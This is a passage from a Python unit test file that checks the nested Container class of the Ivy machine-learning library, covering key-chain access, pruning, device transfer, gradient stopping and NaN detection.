container_repeated = container.einops_repeat("b n -> b n c", c=2)
assert np.allclose(
ivy.to_numpy(container_repeated["a"]),
np.array([[[0.0, 0.0], [1.0, 1.0], [2.0, 2.0], [3.0, 3.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.a),
np.array([[[0.0, 0.0], [1.0, 1.0], [2.0, 2.0], [3.0, 3.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated["b"]["c"]),
np.array([[[5.0, 5.0], [10.0, 10.0], [15.0, 15.0], [20.0, 20.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.b.c),
np.array([[[5.0, 5.0], [10.0, 10.0], [15.0, 15.0], [20.0, 20.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated["b"]["d"]),
np.array([[[10.0, 10.0], [9.0, 9.0], [8.0, 8.0], [7.0, 7.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.b.d),
np.array([[[10.0, 10.0], [9.0, 9.0], [8.0, 8.0], [7.0, 7.0]]]),
)
def test_container_to_dev(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
container_to_cpu = container.to_dev(device)
assert ivy.dev(container_to_cpu["a"], as_str=True) == device
assert ivy.dev(container_to_cpu.a, as_str=True) == device
assert ivy.dev(container_to_cpu["b"]["c"], as_str=True) == device
assert ivy.dev(container_to_cpu.b.c, as_str=True) == device
assert ivy.dev(container_to_cpu["b"]["d"], as_str=True) == device
assert ivy.dev(container_to_cpu.b.d, as_str=True) == device
def test_container_stop_gradients(device, call):
dict_in = {
"a": ivy.variable(
ivy.array(
[[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
)
),
"b": {
"c": ivy.variable(
ivy.array(
[[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
)
),
"d": ivy.variable(
ivy.array(
[[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]],
device=device,
)
),
},
}
container = Container(dict_in)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container["a"])
assert ivy.is_variable(container.a)
assert ivy.is_variable(container["b"]["c"])
assert ivy.is_variable(container.b.c)
assert ivy.is_variable(container["b"]["d"])
assert ivy.is_variable(container.b.d)
# without key_chains specification
container_stopped_grads = container.stop_gradients()
assert ivy.is_ivy_array(container_stopped_grads["a"])
assert ivy.is_ivy_array(container_stopped_grads.a)
assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
assert ivy.is_ivy_array(container_stopped_grads.b.c)
assert ivy.is_ivy_array(container_stopped_grads["b"]["d"])
assert ivy.is_ivy_array(container_stopped_grads.b.d)
# with key_chains to apply
container_stopped_grads = container.stop_gradients(key_chains=["a", "b/c"])
assert ivy.is_ivy_array(container_stopped_grads["a"])
assert ivy.is_ivy_array(container_stopped_grads.a)
assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
assert ivy.is_ivy_array(container_stopped_grads.b.c)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container_stopped_grads["b"]["d"])
assert ivy.is_variable(container_stopped_grads.b.d)
# with key_chains to apply pruned
container_stopped_grads = container.stop_gradients(
key_chains=["a", "b/c"], prune_unapplied=True
)
assert ivy.is_ivy_array(container_stopped_grads["a"])
assert ivy.is_ivy_array(container_stopped_grads.a)
assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
assert ivy.is_ivy_array(container_stopped_grads.b.c)
assert "b/d" not in container_stopped_grads
# with key_chains to not apply
container_stopped_grads = container.stop_gradients(
key_chains=Container({"a": None, "b": {"d": None}}), to_apply=False
)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container_stopped_grads["a"])
assert ivy.is_variable(container_stopped_grads.a)
assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
assert ivy.is_ivy_array(container_stopped_grads.b.c)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container_stopped_grads["b"]["d"])
assert ivy.is_variable(container_stopped_grads.b.d)
# with key_chains to not apply pruned
container_stopped_grads = container.stop_gradients(
key_chains=Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
)
assert "a" not in container_stopped_grads
assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
assert ivy.is_ivy_array(container_stopped_grads.b.c)
assert "b/d" not in container_stopped_grads
def test_container_as_variables(device, call):
dict_in = {
"a": ivy.array(
[[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
),
"b": {
"c": ivy.array(
[[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
),
"d": ivy.array(
[[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]], device=device
),
},
}
container = Container(dict_in)
assert ivy.is_ivy_array(container["a"])
assert ivy.is_ivy_array(container.a)
assert ivy.is_ivy_array(container["b"]["c"])
assert ivy.is_ivy_array(container.b.c)
assert ivy.is_ivy_array(container["b"]["d"])
assert ivy.is_ivy_array(container.b.d)
variable_cont = container.as_variables()
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(variable_cont["a"])
assert ivy.is_variable(variable_cont.a)
assert ivy.is_variable(variable_cont["b"]["c"])
assert ivy.is_variable(variable_cont.b.c)
assert ivy.is_variable(variable_cont["b"]["d"])
assert ivy.is_variable(variable_cont.b.d)
def test_container_as_arrays(device, call):
dict_in = {
"a": ivy.variable(
ivy.array(
[[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
)
),
"b": {
"c": ivy.variable(
ivy.array(
[[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
)
),
"d": ivy.variable(
ivy.array(
[[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]],
device=device,
)
),
},
}
container = Container(dict_in)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container["a"])
assert ivy.is_variable(container.a)
assert ivy.is_variable(container["b"]["c"])
assert ivy.is_variable(container.b.c)
assert ivy.is_variable(container["b"]["d"])
assert ivy.is_variable(container.b.d)
# without key_chains specification
container_as_arrays = container.as_arrays()
assert ivy.is_ivy_array(container_as_arrays["a"])
assert ivy.is_ivy_array(container_as_arrays.a)
assert ivy.is_ivy_array(container_as_arrays["b"]["c"])
assert ivy.is_ivy_array(container_as_arrays.b.c)
assert ivy.is_ivy_array(container_as_arrays["b"]["d"])
assert ivy.is_ivy_array(container_as_arrays.b.d)
def test_container_num_arrays(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
assert container.num_arrays() == 3
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.variable(ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device)),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
assert (
container.num_arrays() == 3
if call in [helpers.np_call, helpers.jnp_call]
else 2
)
def test_container_size_ordered_arrays(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0]], device=device),
},
}
container = Container(dict_in)
size_ordered = container.size_ordered_arrays()
assert np.allclose(ivy.to_numpy(size_ordered.a), np.array([[0.0, 1.0, 2.0, 3.0]]))
assert np.allclose(ivy.to_numpy(size_ordered.b__c), np.array([[5.0, 10.0]]))
assert np.allclose(ivy.to_numpy(size_ordered.b__d), np.array([[10.0, 9.0, 8.0]]))
for v, arr in zip(
size_ordered.values(),
[
np.array([[5.0, 10.0]]),
np.array([[10.0, 9.0, 8.0]]),
np.array([[0.0, 1.0, 2.0, 3.0]]),
],
):
assert np.allclose(ivy.to_numpy(v), arr)
def test_container_to_numpy(device, call):
dict_in = {
"a": ivy.variable(
ivy.array(
[[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
)
),
"b": {
"c": ivy.variable(
ivy.array(
[[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
)
),
"d": ivy.variable(
ivy.array(
[[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]],
device=device,
)
),
},
}
container = Container(dict_in)
# before conversion
assert ivy.is_ivy_array(container["a"])
assert ivy.is_ivy_array(container.a)
assert ivy.is_ivy_array(container["b"]["c"])
assert ivy.is_ivy_array(container.b.c)
assert ivy.is_ivy_array(container["b"]["d"])
assert ivy.is_ivy_array(container.b.d)
# after conversion
container_to_numpy = container.to_numpy()
assert isinstance(container_to_numpy["a"], np.ndarray)
assert isinstance(container_to_numpy.a, np.ndarray)
assert isinstance(container_to_numpy["b"]["c"], np.ndarray)
assert isinstance(container_to_numpy.b.c, np.ndarray)
assert isinstance(container_to_numpy["b"]["d"], np.ndarray)
assert isinstance(container_to_numpy.b.d, np.ndarray)
def test_container_from_numpy(device, call):
dict_in = {
"a": np.array([[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]]),
"b": {
"c": np.array([[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]]),
"d": np.array([[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]]),
},
}
# before conversion
container = Container(dict_in)
assert isinstance(container["a"], np.ndarray)
assert isinstance(container.a, np.ndarray)
assert isinstance(container["b"]["c"], np.ndarray)
assert isinstance(container.b.c, np.ndarray)
assert isinstance(container["b"]["d"], np.ndarray)
assert isinstance(container.b.d, np.ndarray)
# after conversion
container_from_numpy = container.from_numpy()
assert ivy.is_ivy_array(container_from_numpy["a"])
assert ivy.is_ivy_array(container_from_numpy.a)
assert ivy.is_ivy_array(container_from_numpy["b"]["c"])
assert ivy.is_ivy_array(container_from_numpy.b.c)
assert ivy.is_ivy_array(container_from_numpy["b"]["d"])
assert ivy.is_ivy_array(container_from_numpy.b.d)
def test_container_arrays_as_lists(device, call):
dict_in = {
"a": ivy.array(
[[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
),
"b": {
"c": ivy.array(
[[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
),
"d": ivy.array(
[[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]], device=device
),
},
}
container = Container(dict_in)
assert ivy.is_ivy_array(container["a"])
assert ivy.is_ivy_array(container.a)
assert ivy.is_ivy_array(container["b"]["c"])
assert ivy.is_ivy_array(container.b.c)
assert ivy.is_ivy_array(container["b"]["d"])
assert ivy.is_ivy_array(container.b.d)
# without key_chains specification
container_arrays_as_lists = container.arrays_as_lists()
assert isinstance(container_arrays_as_lists["a"], list)
assert isinstance(container_arrays_as_lists.a, list)
assert isinstance(container_arrays_as_lists["b"]["c"], list)
assert isinstance(container_arrays_as_lists.b.c, list)
assert isinstance(container_arrays_as_lists["b"]["d"], list)
assert isinstance(container_arrays_as_lists.b.d, list)
def test_container_has_key(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
assert container.has_key("a") # noqa
assert container.has_key("b") # noqa
assert container.has_key("c") # noqa
assert container.has_key("d") # noqa
assert not container.has_key("e") # noqa
assert not container.has_key("f") # noqa
def test_container_has_key_chain(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
assert container.has_key_chain("a")
assert container.has_key_chain("b")
assert container.has_key_chain("b/c")
assert container.has_key_chain("b/d")
assert not container.has_key_chain("b/e")
assert not container.has_key_chain("c")
def test_container_has_nans(device, call):
container = Container(
{
"a": ivy.array([1.0, 2.0], device=device),
"b": {
"c": ivy.array([2.0, 3.0], device=device),
"d": ivy.array([3.0, 4.0], device=device),
},
}
)
container_nan = Container(
{
"a": ivy.array([1.0, 2.0], device=device),
"b": {
"c": ivy.array([float("nan"), 3.0], device=device),
"d": ivy.array([3.0, 4.0], device=device),
},
}
)
container_inf = Container(
{
"a": ivy.array([1.0, 2.0], device=device),
"b": {
"c": ivy.array([2.0, 3.0], device=device),
"d": ivy.array([3.0, float("inf")], device=device),
},
}
)
container_nan_n_inf = Container(
{
"a": ivy.array([1.0, 2.0], device=device),
"b": {
"c": ivy.array([float("nan"), 3.0], device=device),
"d": ivy.array([3.0, float("inf")], device=device),
},
}
)
# global
# with inf check
assert not container.has_nans()
assert container_nan.has_nans()
assert container_inf.has_nans()
assert container_nan_n_inf.has_nans()
# without inf check
assert not container.has_nans(include_infs=False)
assert container_nan.has_nans(include_infs=False)
assert not container_inf.has_nans(include_infs=False)
assert container_nan_n_inf.has_nans(include_infs=False)
# leafwise
# with inf check
container_hn = container.has_nans(leafwise=True)
assert container_hn.a is False
assert container_hn.b.c is False
assert container_hn.b.d is False
container_nan_hn = container_nan.has_nans(leafwise=True)
assert container_nan_hn.a is False
assert container_nan_hn.b.c is True
assert container_nan_hn.b.d is False
container_inf_hn = container_inf.has_nans(leafwise=True)
assert container_inf_hn.a is False
assert container_inf_hn.b.c is False
assert container_inf_hn.b.d is True
container_nan_n_inf_hn = container_nan_n_inf.has_nans(leafwise=True)
assert container_nan_n_inf_hn.a is False
assert container_nan_n_inf_hn.b.c is True
assert container_nan_n_inf_hn.b.d is True
# without inf check
container_hn = container.has_nans(leafwise=True, include_infs=False)
assert container_hn.a is False
assert container_hn.b.c is False
assert container_hn.b.d is False
container_nan_hn = container_nan.has_nans(leafwise=True, include_infs=False)
assert container_nan_hn.a is False
assert container_nan_hn.b.c is True
assert container_nan_hn.b.d is False
container_inf_hn = container_inf.has_nans(leafwise=True, include_infs=False)
assert container_inf_hn.a is False
assert container_inf_hn.b.c is False
assert container_inf_hn.b.d is False
container_nan_n_inf_hn = container_nan_n_inf.has_nans(
leafwise=True, include_infs=False
)
assert container_nan_n_inf_hn.a is False
assert container_nan_n_inf_hn.b.c is True
assert container_nan_n_inf_hn.b.d is False
def test_container_at_keys(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
new_container = container.at_keys(["a", "c"])
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert "d" not in new_container["b"]
new_container = container.at_keys("c")
assert "a" not in new_container
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert "d" not in new_container["b"]
new_container = container.at_keys(["b"])
assert "a" not in new_container
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([3]))
def test_container_at_key_chain(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
# explicit function call
sub_container = container.at_key_chain("b")
assert np.allclose(ivy.to_numpy(sub_container["c"]), np.array([2]))
sub_container = container.at_key_chain("b/c")
assert np.allclose(ivy.to_numpy(sub_container), np.array([2]))
# overridden built-in function call
sub_container = container["b"]
assert np.allclose(ivy.to_numpy(sub_container["c"]), np.array([2]))
sub_container = container["b/c"]
assert np.allclose(ivy.to_numpy(sub_container), np.array([2]))
def test_container_at_key_chains(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
target_cont = Container({"a": True, "b": {"c": True}})
new_container = container.at_key_chains(target_cont)
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert "d" not in new_container["b"]
new_container = container.at_key_chains(["b/c", "b/d"])
assert "a" not in new_container
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([3]))
new_container = container.at_key_chains("b/c")
assert "a" not in new_container
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert "d" not in new_container["b"]
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_all_key_chains(include_empty, device, call):
a_val = Container() if include_empty else ivy.array([1], device=device)
bc_val = Container() if include_empty else ivy.array([2], device=device)
bd_val = Container() if include_empty else ivy.array([3], device=device)
dict_in = {"a": a_val, "b": {"c": bc_val, "d": bd_val}}
container = Container(dict_in)
kcs = container.all_key_chains(include_empty)
assert kcs[0] == "a"
assert kcs[1] == "b/c"
assert kcs[2] == "b/d"
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_key_chains_containing(include_empty, device, call):
a_val = Container() if include_empty else ivy.array([1], device=device)
bc_val = Container() if include_empty else ivy.array([2], device=device)
bd_val = Container() if include_empty else ivy.array([3], device=device)
dict_in = {"a_sub": a_val, "b": {"c": bc_val, "d_sub": bd_val}}
container = Container(dict_in)
kcs = container.key_chains_containing("sub", include_empty)
assert kcs[0] == "a_sub"
assert kcs[1] == "b/d_sub"
# noinspection PyUnresolvedReferences
def test_container_set_at_keys(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container_orig = Container(dict_in)
# explicit function call
orig_container = container_orig.copy()
container = orig_container.set_at_keys({"b": ivy.array([4], device=device)})
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]), np.array([4]))
assert not container.has_key("c") # noqa
assert not container.has_key("d") # noqa
container = orig_container.set_at_keys(
{"a": ivy.array([5], device=device), "c": ivy.array([6], device=device)}
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([5]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([6]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
# noinspection PyUnresolvedReferences
def test_container_set_at_key_chain(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container_orig = Container(dict_in)
# explicit function call
container = container_orig.copy()
container = container.set_at_key_chain("b/e", ivy.array([4], device=device))
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["e"]), np.array([4]))
container = container.set_at_key_chain("f", ivy.array([5], device=device))
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["e"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container["f"]), np.array([5]))
# overridden built-in function call
container = container_orig.copy()
assert "b/e" not in container
container["b/e"] = ivy.array([4], device=device)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["e"]), np.array([4]))
assert "f" not in container
container["f"] = ivy.array([5], device=device)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["e"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container["f"]), np.array([5]))
# noinspection PyUnresolvedReferences
def test_container_overwrite_at_key_chain(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container_orig = Container(dict_in)
# explicit function call
container = container_orig.copy()
# noinspection PyBroadException
try:
container.overwrite_at_key_chain("b/e", ivy.array([4], device=device))
exception_raised = False
except Exception:
exception_raised = True
assert exception_raised
container = container.overwrite_at_key_chain("b/d", ivy.array([4], device=device))
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([4]))
def test_container_set_at_key_chains(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
target_container = Container(
{"a": ivy.array([4], device=device), "b": {"d": ivy.array([5], device=device)}}
)
new_container = container.set_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([4]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([5]))
target_container = Container({"b": {"c": ivy.array([7], device=device)}})
new_container = container.set_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([7]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([3]))
def test_container_overwrite_at_key_chains(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
target_container = Container(
{"a": ivy.array([4], device=device), "b": {"d": ivy.array([5], device=device)}}
)
new_container = container.overwrite_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([4]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([5]))
target_container = Container({"b": {"c": ivy.array([7], device=device)}})
new_container = container.overwrite_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([7]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([3]))
# noinspection PyBroadException
try:
container.overwrite_at_key_chains(
Container({"b": {"e": ivy.array([5], device=device)}})
)
exception_raised = False
except Exception:
exception_raised = True
assert exception_raised
def test_container_prune_keys(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_pruned = container.prune_keys(["a", "c"])
assert "a" not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert "c" not in container_pruned["b"]
def _test_a_exception(container_in):
try:
_ = container_in.a
return False
except AttributeError:
return True
def _test_bc_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
def _test_bd_exception(container_in):
try:
_ = container_in.b.d
return False
except AttributeError:
return True
assert _test_a_exception(container_pruned)
assert _test_bc_exception(container_pruned)
container_pruned = container.prune_keys(["a", "d"])
assert "a" not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned["b"]["c"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.c), np.array([[2]]))
assert "d" not in container_pruned["b"]
assert _test_a_exception(container_pruned)
assert _test_bd_exception(container_pruned)
def test_container_prune_key_chain(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": None},
}
container = Container(dict_in)
container_pruned = container.prune_key_chain("b/c")
assert np.allclose(ivy.to_numpy(container_pruned["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.a), np.array([[1]]))
assert container_pruned["b"]["d"] is None
assert container_pruned.b.d is None
assert "c" not in container_pruned["b"].keys()
def _test_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
assert _test_exception(container_pruned)
container_pruned = container.prune_key_chain("b")
assert np.allclose(ivy.to_numpy(container_pruned["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.a), np.array([[1]]))
assert "b" not in container_pruned.keys()
def _test_exception(container_in):
try:
_ = container_in.b
return False
except AttributeError:
return True
assert _test_exception(container_pruned)
def test_container_prune_key_chains(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_pruned = container.prune_key_chains(["a", "b/c"])
assert "a" not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert "c" not in container_pruned["b"]
def _test_a_exception(container_in):
try:
_ = container_in.a
return False
except AttributeError:
return True
def _test_bc_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
assert _test_a_exception(container_pruned)
assert _test_bc_exception(container_pruned)
container_pruned = container.prune_key_chains(
Container({"a": True, "b": {"c": True}})
)
assert "a" not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert "c" not in container_pruned["b"]
assert _test_a_exception(container_pruned)
assert _test_bc_exception(container_pruned)
def test_container_format_key_chains(device, call):
dict_in = {
"_a": ivy.array([1], device=device),
"b ": {"c": ivy.array([2], device=device), "d-": ivy.array([3], device=device)},
}
cont = Container(dict_in)
cont_formatted = cont.format_key_chains(
lambda s: s.replace("_", "").replace(" ", "").replace("-", "")
)
assert np.allclose(ivy.to_numpy(cont_formatted["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(cont_formatted.a), np.array([1]))
assert np.allclose(ivy.to_numpy(cont_formatted["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(cont_formatted.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(cont_formatted["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(cont_formatted.b.d), np.array([3]))
def test_container_sort_by_key(device, call):
dict_in = {
"b": ivy.array([1], device=device),
"a": {"d": ivy.array([2], device=device), "c": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_sorted = container.sort_by_key()
for k, k_true in zip(container_sorted.keys(), ["a", "b"]):
assert k == k_true
for k, k_true in zip(container_sorted.a.keys(), ["c", "d"]):
assert k == k_true
def test_container_prune_empty(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": {}, "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_pruned = container.prune_empty()
assert np.allclose(ivy.to_numpy(container_pruned["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert "c" not in container_pruned["b"]
def _test_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
assert _test_exception(container_pruned)
def test_container_prune_key_from_key_chains(device, call):
container = Container(
{
"Ayy": ivy.array([1], device=device),
"Bee": {
"Cee": ivy.array([2], device=device),
"Dee": ivy.array([3], device=device),
},
"Beh": {
"Ceh": ivy.array([4], device=device),
"Deh": ivy.array([5], device=device),
},
}
)
# absolute
container_pruned = container.prune_key_from_key_chains("Bee")
assert np.allclose(ivy.to_numpy(container_pruned["Ayy"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned["Cee"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned["Dee"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert "Bee" not in container_pruned
# containing
container_pruned = container.prune_key_from_key_chains(containing="B")
assert np.allclose(ivy.to_numpy(container_pruned["Ayy"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned["Cee"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned["Dee"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned["Ceh"]), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ceh), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned["Deh"]), np.array([[5]]))
assert np.allclose(ivy.to_numpy(container_pruned.Deh), np.array([[5]]))
assert "Bee" not in container_pruned
assert "Beh" not in container_pruned
def test_container_prune_keys_from_key_chains(device, call):
container = Container(
{
"Ayy": ivy.array([1], device=device),
"Bee": {
"Cee": ivy.array([2], device=device),
"Dee": ivy.array([3], device=device),
},
"Eee": {"Fff": ivy.array([4], device=device)},
}
